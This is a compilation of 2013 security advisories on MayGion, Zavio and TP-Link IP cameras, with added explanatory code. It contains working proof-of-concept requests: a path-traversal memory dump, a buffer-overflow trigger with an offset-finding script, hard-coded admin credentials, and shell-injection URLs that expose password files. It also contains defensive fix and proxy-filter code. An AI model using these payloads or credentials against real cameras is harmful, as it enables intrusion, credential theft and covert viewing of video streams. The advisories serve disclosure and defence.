Buffer overflow in MayGion IP Cameras with firmware before 2013.04.22 (05.53) allows remote attackers to execute arbitrary code via a long filename in a GET request. MayGion IP Camera is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts may result in a denial-of-service condition.

Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

MayGion IP Cameras multiple vulnerabilities

1. *Advisory Information*

Title: MayGion IP Cameras multiple vulnerabilities
Advisory ID: CORE-2013-0322
Advisory URL: http://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities
Date published: 2013-05-28
Date of last update: 2013-05-28
Vendors contacted: MayGion
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Path traversal [CWE-22], Buffer overflow [CWE-119]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-1604, CVE-2013-1605

3. *Vulnerability Description*

The vulnerabilities allow an unauthenticated remote attacker:

1. [CVE-2013-1604] to dump the camera's memory and retrieve user credentials,
2. [CVE-2013-1605] to execute arbitrary code.

4. *Vulnerable Packages*

. MayGion IP cameras based on firmware 2011.27.09.
. Other firmware versions are probably affected too but they were not checked.

5. *Non-Vulnerable Packages*

. H.264 ipcam firmware 2013.04.22.

6. *Credits*

These vulnerabilities were discovered and researched by Nahuel Riva and Francisco Falcon from Core Exploit Writers Team.

7. *Technical Description / Proof of Concept Code*

7.1. *User Credentials Leaked via Path Traversal* [CVE-2013-1604]

The following Python code exploits a path traversal and dumps the camera's memory. Valid user credentials can be extracted from this memory dump by an unauthenticated remote attacker.

/-----
# Python 2 httplib (the module is http.client in Python 3)
import httplib

conn = httplib.HTTPConnection("192.168.100.1")
# nine '..' components climb from the document root to '/', then into /proc
conn.request("GET", "/../../../../../../../../../proc/kcore")
resp = conn.getresponse()
data = resp.read()   # memory image; search it for credential strings
conn.close()
-----/

7.2. *Buffer overflow* [CVE-2013-1605]

The following Python script can be used to trigger the vulnerability without authentication. As a result, the Instruction Pointer register (IP) will be overwritten with 0x61616161, which is a typical buffer overrun condition. 0x61616161 is four 'a' (0x61) bytes; the script as published sends uppercase 'A' (0x41) bytes, for which the register would read 0x41414141. Either way, bytes from the requested filename end up in the instruction pointer, which is what makes the overflow usable for code execution.

/-----
# Python 2 httplib (the module is http.client in Python 3)
import httplib

conn = httplib.HTTPConnection("192.168.100.1")
# a 3000-byte filename overruns the fixed-size buffer holding the request path
conn.request("GET", "/" + "A" * 3000 + ".html")
resp = conn.getresponse()   # raises a connection error if the server process crashed
data = resp.read()
conn.close()
-----/

8. *Report Timeline*

. 2013-05-02: Core Security Technologies notifies MayGion of the vulnerabilities. Publication date is set for May 29th, 2013.
. 2013-05-02: Vendor asks for a report with technical information.
. 2013-05-03: A draft advisory containing technical details is sent to the MayGion team.
. 2013-05-03: Vendor notifies that all vulnerabilities were fixed in the latest firmware version, released April 22nd, 2013.
. 2013-05-09: Core asks for a list of affected devices and firmware. No reply received.
. 2013-05-28: Advisory CORE-2013-0322 is published.

9. *References*

[1] http://www.maygion.com
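Turning the crash above into a usable offset, as an added example that is not code from the advisory or from MayGion: instead of 3000 identical bytes, the request path carries the non-repeating 'Aa0Aa1Aa2...' pattern that Metasploit's pattern_create and pattern_offset tools use, and the value found in the instruction pointer is mapped back to its position in the filename. The register value used in the self-check is derived from the pattern itself, not observed on a device; the target is assumed little-endian (pass `byteorder="big"` otherwise).

```python
"""Offset-finding pattern for the long-filename overflow.

Added example; not code from the advisory or from MayGion. Implements the
'Aa0Aa1Aa2...' scheme of Metasploit's pattern_create / pattern_offset so
the instruction-pointer value seen at the crash maps back to a position in
the request path. The crash value in the self-check is derived from the
pattern itself, not observed on a device.
"""
import string

MAX_PATTERN = 26 * 26 * 10 * 3   # 20280 bytes before the pattern would repeat


def pattern_create(length):
    """First `length` bytes of the pattern. Every 4-byte window is unique
    because the three-character groups (upper, lower, digit) never repeat
    and the letter/digit layout fixes the window's alignment."""
    if length > MAX_PATTERN:
        raise ValueError("pattern would repeat beyond %d bytes" % MAX_PATTERN)
    groups = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                groups.append(upper + lower + digit)
                if len(groups) * 3 >= length:
                    return "".join(groups)[:length]
    return "".join(groups)[:length]


def pattern_offset(pattern, reg_value, width=4, byteorder="little"):
    """Offset in `pattern` of the bytes that produced `reg_value`, the
    integer read from the crashed instruction pointer, or None if the value
    did not come from the pattern (0x41414141 from the PoC's run of 'A', or
    0x61616161 = 'aaaa', both give None)."""
    raw = reg_value.to_bytes(width, byteorder)
    try:
        needle = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    idx = pattern.find(needle)
    return idx if idx >= 0 else None


def overflow_request_path(length=3000):
    """The PoC's request path with the pattern in place of 'A' * length."""
    return "/" + pattern_create(length) + ".html"


def register_value_at(pattern, offset, width=4, byteorder="little"):
    """Integer the register would hold if pattern[offset:offset+width]
    landed in it; used to self-check pattern_offset without a device."""
    chunk = pattern[offset:offset + width].encode("ascii")
    return int.from_bytes(chunk, byteorder)


if __name__ == "__main__":
    pat = pattern_create(3000)
    # Stand-in for the value a debugger would show after the crash.
    crashed_ip = register_value_at(pat, 1337)
    print("request path:", overflow_request_path()[:40] + "...")
    print("IP = 0x%08x -> offset %d" % (crashed_ip, pattern_offset(pat, crashed_ip)))
```

With the offset known, the bytes at that position in the filename are what to replace with an address; the rest of the exploit (what is reachable at that address on the camera's CPU) is outside what the advisory documents.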
VAR-202001-0851 CVE-2013-2569 Zavio IP cameras authentication vulnerability

Related entries in the VARIoT exploits database: VAR-E-201305-0003
CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
A Security Bypass vulnerability exists in Zavio IP Cameras through 1.6.3 because the RTSP protocol authentication is disabled by default, which could let a malicious user obtain unauthorized access to the live video stream. The Zavio IP camera contains an authentication vulnerability; information may be obtained. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. Zavio IP Cameras running firmware version 1.6.03 and below are vulnerable.

1. *Advisory Information*

Title: Zavio IP Cameras multiple vulnerabilities
Advisory ID: CORE-2013-0302
Advisory URL: http://www.coresecurity.com/advisories/zavio-IP-cameras-multiple-vulnerabilities
Date published: 2013-05-28
Date of last update: 2013-05-28
Vendors contacted: Zavio
Release mode: User release

2. *Vulnerability Information*

Class: Use of hard-coded credentials [CWE-798], OS command injection [CWE-78], Incorrect default permissions [CWE-276], OS command injection [CWE-78]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-2567, CVE-2013-2568, CVE-2013-2569, CVE-2013-2570

3. *Vulnerability Description*

The vulnerabilities allow a remote attacker:

1. [CVE-2013-2567] to bypass user web interface authentication using hard-coded credentials.
2. [CVE-2013-2568] to execute arbitrary commands from the administration web interface. This flaw can also be used to obtain all credentials of registered users.
3. [CVE-2013-2569] to access the camera video stream.
4. [CVE-2013-2570] to execute arbitrary commands from the administration web interface (post authentication only).

4. *Vulnerable Packages*

. Zavio IP cameras running firmware version 1.6.03 and below (see the description above).

5. *Non-Vulnerable Packages*

. Vendor did not provide details. Contact Zavio for further information.

6. *Vendor Information, Solutions and Workarounds*

There was no official answer from Zavio after several attempts to report these vulnerabilities (see [Sec. 9]). Contact the vendor for further information. Some mitigation actions may be:

. Do not expose the camera to the Internet unless absolutely necessary.
. Enable RTSP authentication.
. Have at least one proxy filtering HTTP requests to 'manufacture.cgi' and 'wireless_mft.cgi'.
. Check the parameter 'General.Time.NTP.Server' in requests handled by '/opt/cgi/view/param' (reached as '/cgi-bin/admin/param').

7. *Credits*

These vulnerabilities were discovered and researched by Nahuel Riva and Francisco Falcon from Core Exploit Writers Team. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team.

8. *Technical Description / Proof of Concept Code*

8.1. *Hard-Coded Credentials in Administrative Web Interface* [CVE-2013-2567]

Zavio IP cameras use the Boa web server [3], a popular tiny server for embedded Linux devices. 'boa.conf' is the Boa configuration file, and the following account can be found inside:

/-----
# MFT: Specify manufacture commands user name and password
MFT manufacture erutcafunam
-----/

This account is not visible from the user web interface; users are not aware of its existence and cannot eliminate it. Through this account it is possible to access two CGI files located in '/cgi-bin/mft/':

1. 'manufacture.cgi'
2. 'wireless_mft.cgi'

The last file contains the OS command injection shown in the following section.

8.2. *OS Command Injection* [CVE-2013-2568]

The file '/cgi-bin/mft/wireless_mft.cgi' has an OS command injection in the parameter 'ap' that can be exploited using the hard-coded credentials shown in the previous section:

/-----
username: manufacture
password: erutcafunam
-----/

The following proof of concept copies the file where the user credentials are stored into the web server root directory; everything after the ';' in the 'ap' value runs as a shell command:

/-----
http://192.168.1.100/cgi-bin/mft/wireless_mft?ap=travesti;cp%20/var/www/secret.passwd%20/web/html/credenciales
-----/

Afterwards, the user credentials can be obtained by requesting:

/-----
http://192.168.1.100/credenciales
-----/

8.3. *RTSP Authentication Disabled by Default* [CVE-2013-2569]

The RTSP protocol authentication is disabled by default. Therefore, the live video stream can be accessed by a remote unauthenticated attacker by requesting:

/-----
rtsp://192.168.1.100/video.h264
-----/

8.4. *OS Command Injection (Post-auth)* [CVE-2013-2570]

The command injection is located in the function 'sub_C8C8' of the binary '/opt/cgi/view/param'. The vulnerable parameter is 'General.Time.NTP.Server'. The following proof of concept obtains the complete list of access points by executing '/sbin/awpriv ra0 get_site_survey'; the injected command is the part of the parameter value after the ';':

/-----
http://192.168.1.100/cgi-bin/admin/param?action=update&General.Time.DateFormat=ymd&General.Time.SyncSource=NTP&General.Time.TimeZone=GMT-06:00/America/Mexico_City&General.Time.NTP.ServerAuto=no&General.Time.NTP.Server=sarasa!de!palermo;/sbin/awpriv%20ra0%20get_site_survey;&General.Time.NTP.Update=01:00:00&General.Time.DayLightSaving.Enabled=on&General.Time.DayLightSaving.Start.Type=date&General.Time.DayLightSaving.Stop.Type=date&General.Time.DayLightSaving.Start.Month=01&General.Time.DayLightSaving.Stop.Month=01&General.Time.DayLightSaving.Start.Week=1&General.Time.DayLightSaving.Stop.Week=1&General.Time.DayLightSaving.Start.Day=01&General.Time.DayLightSaving.Stop.Day=01&General.Time.DayLightSaving.Start.Date=01&General.Time.DayLightSaving.Stop.Date=01&General.Time.DayLightSaving.Start.Hour=00&General.Time.DayLightSaving.Stop.Hour=00&General.Time.DayLightSaving.Start.Min=00&General.Time.DayLightSaving.Stop.Min=00&Image.OSD.Enabled=off
-----/

9. *Report Timeline*

. 2013-03-19: Core Security Technologies notifies Zavio Tech Support and requests a security manager to whom a draft report regarding these vulnerabilities can be sent. No reply received.
. 2013-05-02: Core asks Zavio Tech Support for a security manager to whom a confidential report can be sent.
. 2013-05-09: Core asks for a reply.
. 2013-05-14: Core asks for a reply.
. 2013-05-21: Core tries to contact the vendor for the last time, without any reply.
. 2013-05-28: After 5 failed attempts to report the issues, the advisory CORE-2013-0302 is published as 'user-release'.

10. *References*

[1] http://www.zavio.com/product.php?id=25
[2] http://zavio.com/product.php?id=23
[3] http://www.boa.org/
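A model of the 'General.Time.NTP.Server' flaw (8.4 above) beside its fix, as an added example that is neither Zavio's firmware code nor Core Security's: the vulnerable builder pastes the parameter into a shell command line, which is the behaviour the PoC relies on, and the hardened version validates the value as a host name and hands it to the NTP client as an argv list that no shell ever parses. The 'ntpclient' binary and its '-h' flag are assumptions standing in for whatever '/opt/cgi/view/param' really runs; the sample request is the PoC URL trimmed to the parameters the example reads.

```python
"""General.Time.NTP.Server: the injection beside the check that stops it.

Added example; not code from the Zavio firmware or from Core Security.
'ntpclient -h <server>' is an assumed stand-in for whatever
'/opt/cgi/view/param' really executes. POC_REQUEST is the advisory's PoC
URL trimmed to the parameters this example reads.
"""
import re
import shlex
from urllib.parse import unquote_plus, urlsplit

# RFC 1123 host label: alphanumerics and hyphens, no leading/trailing hyphen.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(r"^(?:%s\.)*%s$" % (_LABEL, _LABEL))

POC_REQUEST = ("http://192.168.1.100/cgi-bin/admin/param?action=update"
               "&General.Time.SyncSource=NTP&General.Time.NTP.ServerAuto=no"
               "&General.Time.NTP.Server=sarasa!de!palermo;"
               "/sbin/awpriv%20ra0%20get_site_survey;"
               "&General.Time.NTP.Update=01:00:00")


def ntp_server_param(url):
    """Value of General.Time.NTP.Server from an update request. The query
    is split on '&' only, as the CGI evidently does: a ';' stays inside the
    value and reaches the shell."""
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        if unquote_plus(key) == "General.Time.NTP.Server":
            return unquote_plus(value)
    return ""


def build_ntp_command_vulnerable(server):
    """What the CGI effectively does: paste the parameter into a command
    line that is handed to /bin/sh (system()-style)."""
    return "ntpclient -h " + server


def shell_commands(command_line):
    """Simple commands /bin/sh would run for `command_line`, split on the
    separators ';', '&&', '||', '|' and '&' (shlex's POSIX tokenizer)."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands, current = [], []
    for token in lexer:
        if token in (";", "&&", "||", "|", "&"):
            if current:
                commands.append(" ".join(current))
            current = []
        else:
            current.append(token)
    if current:
        commands.append(" ".join(current))
    return commands


def validate_ntp_server(server):
    """Accept only a syntactically valid host name (dotted IPv4 literals
    match the same grammar). Shell metacharacters, spaces and a leading '-'
    (option injection) all fail."""
    return 0 < len(server) <= 253 and _HOSTNAME_RE.match(server) is not None


def build_ntp_command_safe(server):
    """Hardened: validate, then return an argv list for an execve-style
    spawn (subprocess.run(argv) without shell=True). Nothing in the value
    is ever parsed by a shell."""
    if not validate_ntp_server(server):
        raise ValueError("rejected General.Time.NTP.Server value: %r" % server)
    return ["ntpclient", "-h", server]


if __name__ == "__main__":
    value = ntp_server_param(POC_REQUEST)
    print("parameter value :", value)
    print("shell would run :", shell_commands(build_ntp_command_vulnerable(value)))
    print("validated       :", validate_ntp_server(value))
```

The argv form is the actual fix; the allow-list validation is defence in depth, and it is also what the advisory's workaround (checking the parameter at a proxy) can implement without touching the firmware.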
VAR-202001-0854 CVE-2013-2572 Multiple TP-Link IP Camera products use hard-coded credentials

Related entries in the VARIoT exploits database: VAR-E-201305-0137
CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
A Security Bypass vulnerability exists in TP-LINK IP Cameras TL-SC 3130, TL-SC 3130G, 3171G, 4171G, and 3130 1.6.18P12 due to default hard-coded credentials for the administrative Web interface, which could let a malicious user obtain unauthorized access to CGI files. Multiple TP-Link IP camera products contain a vulnerability involving the use of hard-coded credentials; information may be obtained. TP-Link IP cameras are network camera devices. Multiple TP-Link IP camera devices ship with a built-in account with the username 'manufacture' and the password 'erutcafunam', allowing remote attackers who know this account to gain unauthorized access to the device. Proof-of-concept code that exploits the vulnerability is publicly available. Administrators are advised to implement an intrusion prevention system (IPS) or intrusion detection system (IDS) to help detect and prevent attacks that attempt to exploit this vulnerability. TP-Link has released beta firmware versions that fix this vulnerability. Administrators are advised to contact the vendor for future updates.

Core Security - Corelabs Advisory
http://corelabs.coresecurity.com

TP-Link IP Cameras Multiple Vulnerabilities

1. *Advisory Information*

Title: TP-Link IP Cameras Multiple Vulnerabilities
Advisory ID: CORE-2013-0318
Advisory URL: http://www.coresecurity.com/advisories/tp-link-IP-cameras-multiple-vulnerabilities
Date published: 2013-05-28
Date of last update: 2013-05-28
Vendors contacted: TP-Link
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Use of hard-coded credentials [CWE-798], OS command injection [CWE-78]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-2572, CVE-2013-2573

3. *Vulnerability Description*

Multiple vulnerabilities have been found in TP-Link IP cameras based on firmware v1.6.18P12 and below, that could allow an unauthenticated remote attacker:

1. [CVE-2013-2572] to access CGI files of the administrative web interface using hard-coded credentials.
2. [CVE-2013-2573] to execute arbitrary commands from the administration web interface. This flaw can also be used to obtain all credentials of registered users.

4. *Vulnerable Packages*

Tests and PoC were run on:

. TL-SC 3130 ([CVE-2013-2572] works with this device only)
. TL-SC 3130G
. TL-SC 3171G
. TL-SC 4171G

Other TP-Link cameras and firmware versions are probably affected too, but they were not checked.

5. *Vendor Information, Solutions and Workarounds*

Vendor provides the links to patched firmware versions. This software is *beta*; TP-Link will release the final versions with release notes and some new functions and fixes in the following days.

. http://www.tp-link.com/resources/software/TL-SC3430_V1_130527.zip
. http://www.tp-link.com/resources/software/TL-SC3430N_V1_130527.zip
. http://www.tp-link.com/resources/software/TL-SC3130_V1_130527.zip
. http://www.tp-link.com/resources/software/TL-SC3130G_V1_130527.zip
. http://www.tp-link.com/resources/software/TL-SC3171_V1_130527.zip
. http://www.tp-link.com/resources/software/TL-SC3171G_V1_130527.zip
. http://www.tp-link.com/resources/software/TL-SC4171G_V1_130527.zip

6. *Credits*

These vulnerabilities were discovered and researched by Nahuel Riva and Francisco Falcon from Core Exploit Writers Team. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team.

7. *Technical Description / Proof of Concept Code*

7.1. *Hard-Coded Credentials in Administrative Web Interface* [CVE-2013-2572]

The cameras' web interface is served by the Boa web server [1]. 'boa.conf' is the Boa configuration file, and the following account can be found inside:

/-----
# MFT: Specify manufacture commands user name and password
MFT manufacture erutcafunam
-----/

This account is not visible from the user web interface; users are not aware of its existence and cannot eliminate it. Through this account it is possible to access two CGI files located in '/cgi-bin/mft/':

1. 'manufacture.cgi'
2. 'wireless_mft.cgi'

The last file contains the OS command injection shown in the following section.

7.2. *OS Command Injection in wireless_mft.cgi* [CVE-2013-2573]

The file '/cgi-bin/mft/wireless_mft.cgi' has an OS command injection in the parameter 'ap' that can be exploited using the hard-coded credentials shown in the previous section:

/-----
username: manufacture
password: erutcafunam
-----/

The following proof of concept copies the file where the user credentials are stored into the web server root directory; everything after the ';' in the 'ap' value runs as a shell command:

/-----
http://192.168.1.100/cgi-bin/mft/wireless_mft?ap=travesti;cp%20/var/www/secret.passwd%20/web/html/credenciales
-----/

Afterwards, the user credentials can be obtained by requesting:

/-----
http://192.168.1.100/credenciales
-----/

8. *Report Timeline*

. 2013-04-29: Core Security Technologies notifies TP-Link Customer Support of the vulnerabilities. Publication date is set for May 28th, 2013.
. 2013-04-30: TP-Link team asks for a report with technical information.
. 2013-05-02: Technical details sent to TP-Link.
. 2013-05-12: Vendor notifies that a new firmware will be released around May 20th.
. 2013-05-16: Core asks the vendor if they are ready for coordinated public disclosure on May 20th.
. 2013-05-17: Vendor notifies that they have fixed the firmware but the testing process won't be ready before May 24th.
. 2013-05-20: Core notifies that the advisory publication was re-scheduled for Monday 27th.
. 2013-05-23: Vendor sends a copy of the beta firmware in order to confirm whether the issues were fixed.
. 2013-05-27: Vendor notifies that consumers are able to download the beta firmware from the TP-Link website. The final release will be made public in the following days and will add some new functions.
. 2013-05-28: Advisory CORE-2013-0318 published.

9. *References*

[1] http://www.boa.org/
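The filtering proxy the Zavio advisory above lists as a workaround, applied to the identical hidden account on the TP-Link cameras (7.1 and 7.2 above), as an added example that is not code from either vendor or from Core Security: it audits an unpacked firmware's 'boa.conf' for 'MFT' directives and refuses any request under '/cgi-bin/mft/' or carrying HTTP Basic credentials for the hidden user, whatever the path and whatever the password, before the request reaches the camera. The 'boa.conf' excerpt and the requests are constructed from the values the advisories quote.

```python
"""Proxy-side controls for the hidden 'manufacture' account.

Added example; not code from TP-Link, Zavio or Core Security. The boa.conf
excerpt and the requests are constructed from the values the advisories
quote. Only what a filtering proxy can see is used: the request-target,
the Authorization header and, for the audit, the configuration file pulled
from an unpacked firmware image.
"""
import base64
import posixpath
from urllib.parse import unquote, urlsplit

BLOCKED_DIR = "/cgi-bin/mft"   # manufacture.cgi and wireless_mft.cgi live here

# Constructed boa.conf excerpt modelled on the lines quoted in the advisory.
SAMPLE_BOA_CONF = """\
# Boa configuration file (constructed excerpt)
Port 80
DocumentRoot /web/html
# MFT: Specify manufacture commands user name and password
MFT manufacture erutcafunam
"""


def hidden_accounts(boa_conf_text):
    """(user, password) pairs from every 'MFT' directive in boa.conf;
    comment and blank lines are skipped."""
    accounts = []
    for line in boa_conf_text.splitlines():
        fields = line.strip().split()
        if len(fields) >= 3 and fields[0] == "MFT":
            accounts.append((fields[1], fields[2]))
    return accounts


def basic_auth_header(user, password):
    """Authorization header value a client sends for HTTP Basic auth."""
    token = base64.b64encode(("%s:%s" % (user, password)).encode("latin-1"))
    return "Basic " + token.decode("ascii")


def basic_auth_user(headers):
    """User name carried in an 'Authorization: Basic' header, else None."""
    scheme, _, blob = headers.get("Authorization", "").partition(" ")
    if scheme.lower() != "basic" or not blob:
        return None
    try:
        decoded = base64.b64decode(blob.strip(), validate=True).decode("latin-1")
    except ValueError:          # binascii.Error is a ValueError subclass
        return None
    user, sep, _ = decoded.partition(":")
    return user if sep else None


def filter_request(request_target, headers, blocked_users):
    """Decide whether to forward a request to the camera.

    Refuses (a) anything under /cgi-bin/mft/, after decoding and
    normalising the path so '/cgi-bin/./mft/../mft/x' cannot slip past, and
    (b) any Basic credential naming a hidden account, whatever the password
    and whatever the path. Returns (allow, reason)."""
    path = posixpath.normpath(unquote(urlsplit(request_target).path))
    if path == BLOCKED_DIR or path.startswith(BLOCKED_DIR + "/"):
        return False, "blocked path " + path
    user = basic_auth_user(headers)
    if user in blocked_users:
        return False, "hidden account " + user
    return True, "ok"


if __name__ == "__main__":
    users = {u for u, _ in hidden_accounts(SAMPLE_BOA_CONF)}
    poc = "/cgi-bin/mft/wireless_mft?ap=travesti;cp%20/var/www/secret.passwd%20/web/html/credenciales"
    hdr = {"Authorization": basic_auth_header("manufacture", "erutcafunam")}
    print(filter_request(poc, hdr, users))
    print(filter_request("/credenciales", {}, users))
```

Blocking on the user name rather than the full credential pair means the rule keeps working if the password in a later firmware differs, and the path rule catches the CGI even when the caller presents an otherwise legitimate account.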